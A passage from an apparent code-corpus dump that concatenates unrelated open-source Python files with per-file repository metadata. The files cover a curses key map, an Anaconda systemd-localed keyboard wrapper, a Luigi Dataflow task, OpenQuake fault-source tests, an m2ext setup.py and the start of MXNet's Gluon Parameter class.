suite = loader.loadTestsFromModule(mod)
runner.run(suite) | guineawheek/abc2as3 | src/unittest_main.py | Python | gpl-3.0 | 748 |
# -*- encoding: utf-8
"""
This file maps ugly curses keycodes to human readable versions.
"""
import curses
key_map = {
# Single keys
# F1
curses.KEY_F1: "f1", # 265
curses.KEY_F2: "f2", # 266
curses.KEY_F3: "f3", # 267
curses.KEY_F4: "f4", # 268
curses.KEY_F5: "f5", # 269
curses.KEY_F6: "f6", # 270
curses.KEY_F7: "f7", # 271
curses.KEY_F8: "f8", # 272
curses.KEY_F9: "f9", # 273
curses.KEY_F10: "f10", # 274
curses.KEY_F11: "f11", # 275
curses.KEY_F12: "f12", # 276
curses.KEY_UP: "up",
curses.KEY_DOWN: "down",
curses.KEY_LEFT: "left",
curses.KEY_RIGHT: "right",
curses.KEY_ENTER: "enter",
"\n": "enter",
"^J": "enter",
curses.KEY_BACKSPACE: "backspace",
"^?": "backspace",
curses.KEY_DC: "delete",
curses.KEY_HOME: "home",
curses.KEY_END: "end",
curses.KEY_PPAGE: "pageup",
curses.KEY_NPAGE: "pagedown",
331: "insert",
"\t": "tab",
"^I": "tab",
"^[": "escape",
# Control
"^A": "ctrl+a",
"^B": "ctrl+b",
"^C": "ctrl+c",
"^D": "ctrl+d",
"^E": "ctrl+e",
"^F": "ctrl+f",
"^G": "ctrl+g",
"^H": "ctrl+h",
# "^I": "ctrl+i", # Conflicts with 'tab'
# "^J": "ctrl+j", # Conflicts with 'enter'
"^K": "ctrl+k",
"^L": "ctrl+l",
# "^M": "ctrl+m", # Conflicts with 'enter'
"^N": "ctrl+n",
"^O": "ctrl+o",
"^P": "ctrl+p",
"^Q": "ctrl+q",
"^R": "ctrl+r",
"^S": "ctrl+s",
"^T": "ctrl+t",
"^U": "ctrl+u",
"^V": "ctrl+v",
"^W": "ctrl+w",
"^X": "ctrl+x",
"^Y": "ctrl+y",
# "^Z": "ctrl+z", # Conflicts with suspend
544: "ctrl+left",
559: "ctrl+right",
565: "ctrl+up",
524: "ctrl+down",
"kLFT5": "ctrl+left",
"kRIT5": "ctrl+right",
"kUP5": "ctrl+up",
"kDN5": "ctrl+down",
554: "ctrl+pageup",
549: "ctrl+pagedown",
"kNXT5": "ctrl+pageup",
"kPRV5": "ctrl+pagedown",
# Alt
563: "alt+up",
522: "alt+down",
542: "alt+left",
557: "alt+right",
"kUP3": "alt+up",
"kDN3": "alt+down",
"kLFT3": "alt+left",
"kRIT3": "alt+right",
552: "alt+pageup",
547: "alt+pagedown",
"kPRV3": "alt+pageup",
"kNXT3": "alt+pagedown",
# Shift
353: "shift+tab",
}
| severin31/suplemon | suplemon/key_mappings.py | Python | mit | 2,302 |
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.core.dbus import SystemBus
from pyanaconda.modules.common.constants.services import LOCALED
from pyanaconda.core.configuration.anaconda import conf
from pyanaconda.keyboard import join_layout_variant, parse_layout_variant
from pyanaconda.core.constants import DEFAULT_KEYBOARD
from pyanaconda.anaconda_loggers import get_module_logger
log = get_module_logger(__name__)
class LocaledWrapper(object):
"""Class wrapping systemd-localed daemon functionality."""
def __init__(self):
self._localed_proxy = None
if not conf.system.provides_system_bus:
log.debug("Not using localed service: "
"system does not provide system bus according to configuration.")
return
if not SystemBus.check_connection():
log.debug("Not using localed service: "
"system bus connection check failed.")
return
self._localed_proxy = LOCALED.get_proxy()
@property
def keymap(self):
"""Get current VConsole keymap.
:return: VConsole keymap specification
:rtype: string
"""
if not self._localed_proxy:
return ""
return self._localed_proxy.VConsoleKeymap
@property
def layouts_variants(self):
"""Get current X11 layouts with variants.
:return: a list of "layout (variant)" or "layout" layout specifications
:rtype: list(str)
"""
if not self._localed_proxy:
return []
layouts = self._localed_proxy.X11Layout
variants = self._localed_proxy.X11Variant
layouts = layouts.split(",") if layouts else []
variants = variants.split(",") if variants else []
# if there are more layouts than variants, empty strings should be appended
diff = len(layouts) - len(variants)
variants.extend(diff * [""])
return [join_layout_variant(layout, variant) for layout, variant in zip(layouts, variants)]
@property
def options(self):
"""Get current X11 options.
:return: a list of X11 options
:rtype: list(str)
"""
if not self._localed_proxy:
return []
options = self._localed_proxy.X11Options
return options.split(",") if options else []
def set_keymap(self, keymap, convert=False):
"""Set current VConsole keymap.
:param keymap: VConsole keymap that should be set
:type keymap: str
:param convert: whether the keymap should be converted and set as X11 layout
:type convert: bool
"""
if not self._localed_proxy:
return ""
self._localed_proxy.SetVConsoleKeyboard(keymap, "", convert, False)
def convert_keymap(self, keymap):
"""Get X11 layouts and variants by converting VConsole keymap.
NOTE: Systemd-localed performs the conversion. Current VConsole keymap
and X11 layouts are set temporarily to the converted values in the
process of conversion.
:param keymap: VConsole keymap
:type keymap: str
:return: a list of "layout (variant)" or "layout" layout specifications
obtained by conversion of VConsole keymap
:rtype: list(str)
"""
if not self._localed_proxy:
return []
# hack around systemd's lack of functionality -- no function to just
# convert without changing keyboard configuration
orig_layouts_variants = self.layouts_variants
orig_keymap = self.keymap
converted_layouts = self.set_and_convert_keymap(keymap)
self.set_layouts(orig_layouts_variants)
self.set_keymap(orig_keymap)
return converted_layouts
def set_and_convert_keymap(self, keymap):
"""Set VConsole keymap and set and get converted X11 layouts.
:param keymap: VConsole keymap
:type keymap: str
:return: a list of "layout (variant)" or "layout" layout specifications
obtained by conversion from VConsole keymap
:rtype: list(str)
"""
self.set_keymap(keymap, convert=True)
return self.layouts_variants
def set_layouts(self, layouts_variants, options=None, convert=False):
"""Set X11 layouts.
:param layouts_variants: list of 'layout (variant)' or 'layout'
specifications of layouts and variants
:type layouts_variants: list(str)
:param options: list of X11 options that should be set
:type options: list(str)
:param convert: whether the layouts should be converted to a VConsole keymap
(see set_and_convert_layouts)
:type convert: bool
"""
if not self._localed_proxy:
return
layouts = []
variants = []
for layout_variant in (nonempty for nonempty in layouts_variants if nonempty):
(layout, variant) = parse_layout_variant(layout_variant)
layouts.append(layout)
variants.append(variant)
layouts_str = ",".join(layouts)
variants_str = ",".join(variants)
options_str = ",".join(options) if options else ""
self._localed_proxy.SetX11Keyboard(
layouts_str,
"",
variants_str,
options_str,
convert,
False
)
def set_and_convert_layouts(self, layouts_variants):
"""Set X11 layouts and set and get converted VConsole keymap.
:param layouts_variants: list of 'layout (variant)' or 'layout'
specifications of layouts and variants
:type layouts_variants: list(str)
:return: a VConsole keymap obtained by conversion from X11 layouts
:rtype: str
"""
self.set_layouts(layouts_variants, convert=True)
return self.keymap
def convert_layouts(self, layouts_variants):
"""Get VConsole keymap by converting X11 layouts and variants.
NOTE: Systemd-localed performs the conversion. Current VConsole keymap
and X11 layouts are set temporarily to the converted values in the
process of conversion.
:param layouts_variants: list of 'layout (variant)' or 'layout'
specifications of layouts and variants
:type layouts_variants: list(str)
:return: a VConsole keymap obtained by conversion from X11 layouts
:rtype: str
"""
if not self._localed_proxy:
return ""
# hack around systemd's lack of functionality -- no function to just
# convert without changing keyboard configuration
orig_layouts_variants = self.layouts_variants
orig_keymap = self.keymap
ret = self.set_and_convert_layouts(layouts_variants)
self.set_layouts(orig_layouts_variants)
self.set_keymap(orig_keymap)
return ret
def get_missing_keyboard_configuration(localed_wrapper, x_layouts, vc_keymap):
"""Get missing keyboard settings by conversion and default values.
:param localed_wrapper: instance of systemd-localed service wrapper
:type localed_wrapper: LocaledWrapper
:param x_layouts: list of X layout specifications
:type x_layouts: list(str)
:param vc_keymap: virtual console keyboard mapping name
:type vc_keymap: str
:returns: tuple of X layouts and VC keyboard settings
:rtype: (list(str), str))
"""
if not vc_keymap and not x_layouts:
log.debug("Using default value %s for missing virtual console keymap.", DEFAULT_KEYBOARD)
vc_keymap = DEFAULT_KEYBOARD
if not vc_keymap:
vc_keymap = localed_wrapper.convert_layouts(x_layouts)
log.debug("Missing virtual console keymap value %s converted from %s X layouts",
vc_keymap, x_layouts)
if not x_layouts:
x_layouts = localed_wrapper.convert_keymap(vc_keymap)
log.debug("Missing X layouts value %s converted from %s virtual console keymap",
x_layouts, vc_keymap)
return x_layouts, vc_keymap
| atodorov/anaconda | pyanaconda/modules/localization/localed.py | Python | gpl-2.0 | 9,105 |
import luigi
import target
from luigi_gcloud.dataflow import DataFlowJavaTask
from storage_tasks import CopyLocalToStorage
class CopyViaDataFlowToStorage(DataFlowJavaTask):
day = luigi.DateParameter()
def output(self):
return target.storage_mail(self.day, 'dump').gcs
def requires(self):
return CopyLocalToStorage(self.day)
def dataflow(self):
return "/luigi-dataflow/pipeline/build/libs/pipeline-copy-1.0.jar"
def configuration(self):
return {
"runner": "DataflowPipelineRunner",
"autoscalingAlgorithm": "BASIC",
"maxNumWorkers": "3"
}
def variables(self):
return {
'in': target.storage_mail_path(self.day).path,
'out': target.storage_mail(self.day, 'df').path
}
| alexvanboxel/luigiext-gcloud | examples/dataflow_tasks.py | Python | apache-2.0 | 812 |
# The Hazard Library
# Copyright (C) 2012-2017 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from openquake.hazardlib.source.complex_fault import (ComplexFaultSource,
_float_ruptures)
from openquake.hazardlib.geo import Line, Point
from openquake.hazardlib.geo.surface.simple_fault import SimpleFaultSurface
from openquake.hazardlib.scalerel.peer import PeerMSR
from openquake.hazardlib.mfd import EvenlyDiscretizedMFD
from openquake.hazardlib.tom import PoissonTOM
from openquake.hazardlib.tests.source import simple_fault_test
from openquake.hazardlib.tests.source import \
_complex_fault_test_data as test_data
from openquake.hazardlib.tests import assert_pickleable
class ComplexFaultSourceSimpleGeometryIterRupturesTestCase(
simple_fault_test.SimpleFaultIterRupturesTestCase):
# test that complex fault sources of simple geometry behave
# exactly the same as simple fault sources of the same geometry
def _make_source(self, *args, **kwargs):
source = super(ComplexFaultSourceSimpleGeometryIterRupturesTestCase,
self)._make_source(*args, **kwargs)
surface = SimpleFaultSurface.from_fault_data(
source.fault_trace, source.upper_seismogenic_depth,
source.lower_seismogenic_depth, source.dip,
source.rupture_mesh_spacing
)
mesh = surface.get_mesh()
top_edge = Line(list(mesh[0:1]))
bottom_edge = Line(list(mesh[-1:]))
cfs = ComplexFaultSource(
source.source_id, source.name, source.tectonic_region_type,
source.mfd, source.rupture_mesh_spacing,
source.magnitude_scaling_relationship, source.rupture_aspect_ratio,
source.temporal_occurrence_model, [top_edge, bottom_edge],
source.rake
)
assert_pickleable(cfs)
return cfs
class ComplexFaultSourceIterRupturesTestCase(
simple_fault_test._BaseFaultSourceTestCase):
def _make_source(self, mfd, aspect_ratio, rupture_mesh_spacing, edges):
source_id = name = 'test-source'
trt = self.TRT
rake = self.RAKE
tom = self.TOM
magnitude_scaling_relationship = PeerMSR()
rupture_aspect_ratio = aspect_ratio
edges = [Line([Point(*coords) for coords in edge])
for edge in edges]
cfs = ComplexFaultSource(
source_id, name, trt, mfd, rupture_mesh_spacing,
magnitude_scaling_relationship, rupture_aspect_ratio, tom,
edges, rake
)
assert_pickleable(cfs)
return cfs
def test_1(self):
# Complex fault source equivalent to Simple fault source defined
# by only the top and bottom edges. That is the complex fault surface
# is equivalent to a simple fault surface defined in the following way:
# fault_trace = [Point(0.0,0.0,0.0),
# Point(0.0,0.0359728811758,0.0),
# Point(0.0190775080917,0.0550503815181,0.0),
# Point(0.03974514139,0.0723925718855,0.0)]
# upper_seismo_depth = 0.0
# lower_seismo_depth = 4.2426406871192848
# dip = 45.0
# mesh_spacing = 1.0
# Being a regular surface and with points in the top and bottom edges
# with a spacing that is a multiple of the given mesh spacing, the
# expected mesh spacing is uniform and equal to the mesh_spacing given
# in the constructor, that is 1 km. Each mesh cell has an area of
# 1 squared km.
# In this case the fmd contains only one magnitude (3.5),
# and this originates ruptures with area equal to 0.3162277660168 km**2
# (according to PeerTestMagAreaScalingRel area = 10**(3.5-4))
# given an aspect ratio of 1, the rupture dimensions are:
# rup_length = sqrt(0.31622776601683794 * 1) = 0.56234132519034907
# rup_width = 0.56234132519034907
# Rupture lenght corresponds therefore to two nodes along length, and
# two nodes along width provides the closest area value, so each
# rupture extends for two nodes along lenght and 2 nodes along width.
# Given 11 nodes along lenght, and 7 along width, and assuming the
# rupture offset to be equal to mesh_spacing, the total number of
# ruptures along lenght is 10 and along width is 6. So the total number
# is 60. the rate associated to a magnitude 3.5 from the truncated GR
# (with bin width = 1.0) is 10**(0.5 -3.0) - 10**(0.5-4.0) =
# 0.0028460498941515417 the rate associated to each rupture is
# 0.0028460498941515417 / 60 = 4.7434164902525696e-05
# for each rupture the probability of one or more occurrences is
# 1-exp(- 4.7434164902525696e-05 * 50.0) = 0.0023688979672850108
source = self._make_source(test_data.TEST1_MFD,
test_data.TEST1_RUPTURE_ASPECT_RATIO,
test_data.TEST1_MESH_SPACING,
test_data.TEST1_EDGES)
self._test_ruptures(test_data.TEST1_RUPTURES, source)
def test_2(self):
# Complex fault source equivalent to Simple fault source defined by
# top, bottom and intermediate edges. That is the complex fault surface
# is equivalent to a simple fault surface defined in the following way:
# fault_trace = [Point(0.0,0.0,0.0),
# Point(0.0,0.0359728811758,0.0),
# Point(0.0190775080917,0.0550503815181,0.0),
# Point(0.03974514139,0.0723925718855,0.0)]
# upper_seismo_depth = 0.0
# lower_seismo_depth = 4.2426406871192848
# dip = 45.0
# mesh_spacing = 1.0
# Being a regular surface and with points in the top and bottom edges
# with a spacing that is a multiple of the given mesh spacing, the
# expected mesh spacing is uniform and equal to the mesh_spacing given
# in the constructor, that is 1 km. Each mesh cell has an area of
# 1 squared km.
# In this case the fmd contains only one magnitude (3.5), and this
# originates ruptures with area equal to 0.31622776601683794 km**2
# (according to PeerTestMagAreaScalingRel area = 10**(3.5-4))
# given an aspect ratio of 1, the rupture dimensions are:
# rup_length = sqrt(0.31622776601683794 * 1) = 0.56234132519034907
# rup_width = 0.56234132519034907
# Rupture lenght corresponds therefore to two nodes along length, and
# two nodes along width provides the closest area value, so each
# rupture extends for two nodes along lenght and 2 nodes along width.
# Given 11 nodes along lenght, and 7 along width, and assuming the
# rupture offset to be equal to mesh_spacing, the total number
# of ruptures along lenght is 10 and along width is 6. So the total
# number is 60. the rate associated to a magnitude 3.5 from the
# truncated GR (with bin width = 1.0) is 10**(0.5 -3.0) - 10**(0.5-4.0)
# = 0.0028460498941515417. the rate associated to each rupture is
# 0.0028460498941515417 / 60 = 4.7434164902525696e-05
# for each rupture the probability of one or more occurrences is
# 1-exp(- 4.7434164902525696e-05 * 50.0) = 0.0023688979672850108
source = self._make_source(test_data.TEST2_MFD,
test_data.TEST2_RUPTURE_ASPECT_RATIO,
test_data.TEST2_MESH_SPACING,
test_data.TEST2_EDGES)
self._test_ruptures(test_data.TEST2_RUPTURES, source)
def test_3(self):
# Complex fault source equivalent to Simple fault source defined by
# top, bottom and intermediate edges. That is the complex fault surface
# is equivalent to a simple fault surface defined in the following way:
# fault_trace = [Point(0.0,0.0,0.0),
# Point(0.0,0.0359728811758,0.0),
# Point(0.0190775080917,0.0550503815181,0.0),
# Point(0.03974514139,0.0723925718855,0.0)]
# upper_seismo_depth = 0.0
# lower_seismo_depth = 4.2426406871192848
# dip = 45.0
# mesh_spacing = 1.0
# Being a regular surface and with points in the top and bottom edges
# with a spacing that is a multiple of the given mesh spacing, the
# expected mesh spacing is uniform and equal to the mesh_spacing given
# in the constructor, that is 1 km. Each mesh cell has an area of
# 1 squared km.
# In this case the fmd contains only one magnitude (6.5), and this
# originates ruptures with area equal to 316.22776601683796 km**2
# (according to PeerTestMagAreaScalingRel area = 10**(6.5-4))
# assuming an aspect ratio of 1.0, the rupture dimensions are:
# rup_length = sqrt(316.22776601683796 * 1.0) = 17.782794100389228
# rup_width = 17.782794100389228
# rupture dimensions are clipped to fault dimensions In this case each
# rupture extends for 11 nodes along lenght and 7 nodes along width.
# The total number of ruptures is 1. the rate associated to a magnitude
# 6.5 from the truncated GR (bin width = 1) is
# 10**(0.5 - 6.0) - 10**(0.5 - 7.0) = 2.8460498941515413e-06
# the rate associated to each rupture is
# 2.8460498941515413e-06 / 1 = 2.8460498941515413e-06
# for each rupture the probability of one or more occurrences is
# 1-exp(- 2.8460498941515413e-06 * 50.0) = 0.00014229237018781316
source = self._make_source(test_data.TEST3_MFD,
test_data.TEST3_RUPTURE_ASPECT_RATIO,
test_data.TEST3_MESH_SPACING,
test_data.TEST3_EDGES)
self._test_ruptures(test_data.TEST3_RUPTURES, source)
def test_4(self):
# test 4 (Complex fault with top, bottom and intermediate edges with
# variable length)
# top edge length = 3 km
# intermediate edge = 6 km
# bottom edge = 9 km
# the spacing between edges along depth is of 1 km. Average lenght is
# 6 km. Assuming a mesh spacing = 2 km, the number of points per edge
# is 6 / 2 + 1 = 4. Consequently, top edge has a spacing of 1km,
# intermediate edge of 2 km, and bottom edge 3km. each cell area is
# a vertical trapezoid.
# cells area in the first row is ((1 + 2) / 2) * 1) = 1.5 km**2
# cells area in the second row is ((2 + 3) / 2 * 1) = 2.5 km**2
# In this case the fmd contains only one magnitude (4.0),
# and this originates ruptures with area equal to 1 km**2 (according to
# PeerTestMagAreaScalingRel area = 10**(4.0-4)). assuming an aspect
# ratio of 1.0, the rupture dimensions are:
# rup_length = sqrt(1.0 * 1.0) = 1.0
# rup_width = 1.0
#
# With these setting, 3 ruptures will be generated in the first row,
# and 3 ruptures in the second row. so the expected total number
# of rupture is 6. each rupture consists of 4 points.
#
# the rate associated to a magnitude 4.0 from the truncated GR (bin
# width = 0.1) is 10**(0.5 - 3.95) - 10**(0.5 - 4.05) = 7.29750961e-5
# the rate associated to each rupture is therefore 7.29750961e-5 / 6
# = 1.216251602e-05
source = self._make_source(test_data.TEST4_MFD,
test_data.TEST4_RUPTURE_ASPECT_RATIO,
test_data.TEST4_MESH_SPACING,
test_data.TEST4_EDGES)
self._test_ruptures(test_data.TEST4_RUPTURES, source)
class ComplexFaultSourceRupEnclPolyTestCase(
simple_fault_test.SimpleFaultRupEncPolyTestCase):
# test that complex fault sources of simple geometry behave
# exactly the same as simple fault sources of the same geometry
def _make_source(self, mfd, aspect_ratio, fault_trace, dip):
sf = super(ComplexFaultSourceRupEnclPolyTestCase, self)._make_source(
mfd, aspect_ratio, fault_trace, dip
)
# create an equivalent top and bottom edges
vdist_top = sf.upper_seismogenic_depth
vdist_bottom = sf.lower_seismogenic_depth
hdist_top = vdist_top / numpy.tan(numpy.radians(dip))
hdist_bottom = vdist_bottom / numpy.tan(numpy.radians(dip))
strike = fault_trace[0].azimuth(fault_trace[-1])
azimuth = (strike + 90.0) % 360
top_edge = []
bottom_edge = []
for point in fault_trace.points:
top_edge.append(point.point_at(hdist_top, vdist_top, azimuth))
bottom_edge.append(point.point_at(hdist_bottom, vdist_bottom,
azimuth))
edges = [Line(top_edge), Line(bottom_edge)]
return ComplexFaultSource(
sf.source_id, sf.name, sf.tectonic_region_type,
sf.mfd, sf.rupture_mesh_spacing,
sf.magnitude_scaling_relationship, sf.rupture_aspect_ratio,
sf.temporal_occurrence_model, edges, sf.rake
)
class FloatRupturesTestCase(unittest.TestCase):
def test_reshaping_along_length(self):
cell_area = numpy.array([[1, 1, 1],
[1, 1, 1]], dtype=float)
cell_length = numpy.array([[1, 1, 1],
[1, 1, 1]], dtype=float)
rupture_area = 3.1
rupture_length = 1.0
slices = _float_ruptures(rupture_area, rupture_length,
cell_area, cell_length)
self.assertEqual(len(slices), 2)
s1, s2 = slices
self.assertEqual(s1, (slice(0, 3), slice(0, 3)))
self.assertEqual(s2, (slice(0, 3), slice(1, 4)))
rupture_area = 4.2
slices = _float_ruptures(rupture_area, rupture_length,
cell_area, cell_length)
self.assertEqual(len(slices), 1)
self.assertEqual(slices, [s1])
def test_reshaping_along_width(self):
cell_area = numpy.array([[4, 4],
[4, 4],
[2, 2]], dtype=float)
cell_length = numpy.array([[2, 2], [2, 2], [2, 2]], dtype=float)
rupture_area = 13.0
rupture_length = 12.0
slices = _float_ruptures(rupture_area, rupture_length,
cell_area, cell_length)
self.assertEqual(len(slices), 2)
s1, s2 = slices
self.assertEqual(s1, (slice(0, 3), slice(0, 3)))
self.assertEqual(s2, (slice(1, 4), slice(0, 3)))
def test_varying_width(self):
cell_area = numpy.array([[1, 1, 1],
[1, 0.1, 1],
[1, 0.1, 1]], dtype=float)
cell_length = numpy.array([[1, 1, 1], [1, 1, 1], [1, 1, 1]],
dtype=float)
rupture_area = 2.1
rupture_length = 1.0
slices = _float_ruptures(rupture_area, rupture_length,
cell_area, cell_length)
self.assertEqual(len(slices), 6)
tl, tm, tr, bl, bm, br = slices
self.assertEqual(tl, (slice(0, 3), slice(0, 2)))
self.assertEqual(tm, (slice(0, 4), slice(1, 3)))
self.assertEqual(tr, (slice(0, 3), slice(2, 4)))
self.assertEqual(bl, (slice(1, 4), slice(0, 2)))
self.assertEqual(bm, (slice(1, 4), slice(1, 3)))
self.assertEqual(br, (slice(1, 4), slice(2, 4)))
class ModifyComplexFaultGeometryTestCase(unittest.TestCase):
"""
"""
def setUp(self):
top_edge_1 = Line([Point(30.0, 30.0, 1.0), Point(31.0, 30.0, 1.0)])
bottom_edge_1 = Line([Point(29.7, 29.9, 30.0),
Point(31.3, 29.9, 32.0)])
self.edges = [top_edge_1, bottom_edge_1]
self.mfd = EvenlyDiscretizedMFD(7.0, 0.1, [1.0])
self.aspect = 1.0
self.spacing = 5.0
self.rake = 90.
def _make_source(self, edges):
source_id = name = 'test-source'
trt = "Subduction Interface"
tom = PoissonTOM(50.0)
magnitude_scaling_relationship = PeerMSR()
cfs = ComplexFaultSource(
source_id, name, trt, self.mfd, self.spacing,
magnitude_scaling_relationship, self.aspect, tom,
edges, self.rake
)
return cfs
def test_modify_geometry(self):
fault = self._make_source(self.edges)
# Modify the edges
top_edge_2 = Line([Point(29.9, 30.0, 2.0), Point(31.1, 30.0, 2.1)])
bottom_edge_2 = Line([Point(29.6, 29.9, 29.0),
Point(31.4, 29.9, 33.0)])
fault.modify_set_geometry([top_edge_2, bottom_edge_2], self.spacing)
exp_lons_top = [29.9, 31.1]
exp_lats_top = [30.0, 30.0]
exp_depths_top = [2.0, 2.1]
exp_lons_bot = [29.6, 31.4]
exp_lats_bot = [29.9, 29.9]
exp_depths_bot = [29.0, 33.0]
for iloc in range(len(fault.edges[0])):
self.assertAlmostEqual(fault.edges[0].points[iloc].longitude,
exp_lons_top[iloc])
self.assertAlmostEqual(fault.edges[0].points[iloc].latitude,
exp_lats_top[iloc])
self.assertAlmostEqual(fault.edges[0].points[iloc].depth,
exp_depths_top[iloc])
for iloc in range(len(fault.edges[1])):
self.assertAlmostEqual(fault.edges[1].points[iloc].longitude,
exp_lons_bot[iloc])
self.assertAlmostEqual(fault.edges[1].points[iloc].latitude,
exp_lats_bot[iloc])
self.assertAlmostEqual(fault.edges[1].points[iloc].depth,
exp_depths_bot[iloc])
| gem/oq-hazardlib | openquake/hazardlib/tests/source/complex_fault_test.py | Python | agpl-3.0 | 18,749 |
from distutils.core import setup
from distutils.command import build_ext
from distutils.core import Extension
import os, sys
def load_description():
try:
f = open('README.rst', 'r')
description = f.read()
f.close()
return description
except:
return ""
class OpensslBuilder(build_ext.build_ext):
"""
Specialization of build_ext to enable swig_opts to inherit any
include_dirs settings made at the command line or in a setup.cfg
file
"""
user_options = build_ext.build_ext.user_options + [
('openssl=', 'o', 'Prefix for openssl installation location'),
('swig-extra=', None, 'Extra swig options')]
def initialize_options(self):
build_ext.build_ext.initialize_options(self)
self.swig_extra = None
if os.name == 'nt':
self.libraries = ['ssleay32', 'libeay32']
self.openssl = 'c:\\pkg'
else:
self.libraries = ['ssl', 'crypto']
self.openssl = '/usr'
def finalize_options(self):
build_ext.build_ext.finalize_options(self)
openssl_include = os.path.join(self.openssl, 'include')
openssl_lib = os.path.join(self.openssl, 'lib')
self.swig_opts = ['-I%s' % i for i in self.include_dirs + [openssl_include]] + ['-includeall', '-noproxy']
if self.swig_extra is not None:
if hasattr(self.swig_extra, 'pop'):
self.swig_opts.extend(self.swig_extra)
else:
self.swig_opts.append(self.swig_extra)
self.include_dirs.append(openssl_include)
self.library_dirs.append(openssl_lib)
m2ext = Extension(name="m2ext._m2ext",
sources=["swig/m2ext.i"],
extra_compile_args=["-DTHREADING"])
setup(
name='m2ext',
version='0.1',
description='M2Crypto Extensions',
long_description=load_description(),
author='Lev Shamardin',
author_email='shamardin@gmail.com',
license='BSD',
url='https://github.com/abbot/m2ext',
ext_modules = [m2ext],
packages=["m2ext"],
cmdclass = {'build_ext': OpensslBuilder},
)
| abbot/m2ext | setup.py | Python | bsd-2-clause | 2,152 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=
"""Neural network parameter."""
__all__ = ['DeferredInitializationError', 'Parameter', 'Constant',
'ParameterDict', 'tensor_types']
from collections import OrderedDict
import warnings
import numpy as np
from ..base import mx_real_t, MXNetError
from .. import symbol, ndarray, initializer, context
from ..context import Context, cpu
from .. import autograd
from .utils import _indent, _brief_print_list
# pylint: disable= invalid-name
tensor_types = (symbol.Symbol, ndarray.NDArray)
# pylint: enable= invalid-name
class DeferredInitializationError(MXNetError):
"""Error for unfinished deferred initialization."""
pass
class Parameter(object):
"""A Container holding parameters (weights) of Blocks.
:py:class:`Parameter` holds a copy of the parameter on each :py:class:`Context` after
it is initialized with ``Parameter.initialize(...)``. If :py:attr:`grad_req` is
not ``'null'``, it will also hold a gradient array on each :py:class:`Context`::
ctx = mx.gpu(0)
x = mx.nd.zeros((16, 100), ctx=ctx)
w = mx.gluon.Parameter('fc_weight', shape=(64, 100), init=mx.init.Xavier())
b = mx.gluon.Parameter('fc_bias', shape=(64,), init=mx.init.Zero())
w.initialize(ctx=ctx)
b.initialize(ctx=ctx)
out = mx.nd.FullyConnected(x, w.data(ctx), b.data(ctx), num_hidden=64)
Parameters
----------
name : str
Name of this parameter.
grad_req : {'write', 'add', 'null'}, default 'write'
Specifies how to update gradient to grad arrays.
- ``'write'`` means everytime gradient is written to grad :py:class:`NDArray`.
- ``'add'`` means everytime gradient is added to the grad :py:class:`NDArray`. You need
to manually call ``zero_grad()`` to clear the gradient buffer before each
iteration when using this option.
- 'null' means gradient is not requested for this parameter. gradient arrays
will not be allocated.
shape : tuple of int, default None
Shape of this parameter. By default shape is not specified. Parameter with
unknown shape can be used for :py:class:`Symbol` API, but ``init`` will throw an error
when using :py:class:`NDArray` API.
dtype : numpy.dtype or str, default 'float32'
Data type of this parameter. For example, ``numpy.float32`` or ``'float32'``.
lr_mult : float, default 1.0
Learning rate multiplier. Learning rate will be multiplied by lr_mult
when updating this parameter with optimizer.
wd_mult : float, default 1.0
Weight decay multiplier (L2 regularizer coefficient). Works similar to lr_mult.
init : Initializer, default None
Initializer of this parameter. Will use the global initializer by default.
Attributes
----------
grad_req : {'write', 'add', 'null'}
This can be set before or after initialization. Setting ``grad_req`` to ``'null'``
with ``x.grad_req = 'null'`` saves memory and computation when you don't
need gradient w.r.t x.
lr_mult : float
Local learning rate multiplier for this Parameter. The actual learning rate
is calculated with ``learning_rate * lr_mult``. You can set it with
``param.lr_mult = 2.0``
wd_mult : float
Local weight decay multiplier for this Parameter.
"""
def __init__(self, name, grad_req='write', shape=None, dtype=mx_real_t,
lr_mult=1.0, wd_mult=1.0, init=None, allow_deferred_init=False,
differentiable=True):
self._var = None
self._data = None
self._grad = None
self._ctx_list = None
self._ctx_map = None
self._deferred_init = ()
self._differentiable = differentiable
self._allow_deferred_init = allow_deferred_init
self._grad_req = None
self._shape = shape
self.name = name
self.dtype = dtype
self.lr_mult = lr_mult
self.wd_mult = wd_mult
self.grad_req = grad_req
self.init = init
def __repr__(self):
s = 'Parameter {name} (shape={shape}, dtype={dtype})'
return s.format(name=self.name, shape=self.shape, dtype=self.dtype)
@property
def grad_req(self):
return self._grad_req
@grad_req.setter
def grad_req(self, req):
assert req in ['write', 'add', 'null'], \
"grad_req must be one of 'write', 'add', or 'null', but got '%s'"%req
if not self._differentiable:
req = 'null'
if self._grad_req == req:
return
self._grad_req = req
if req == 'null' and self._grad is not None:
self._grad = None
self._data = [i.detach() for i in self._data]
elif self._data is not None:
self._init_grad()
@property
def shape(self):
return self._shape
@shape.setter
def shape(self, new_shape):
if self._shape is None:
self._shape = new_shape
return
assert len(self._shape) == len(new_shape) and \
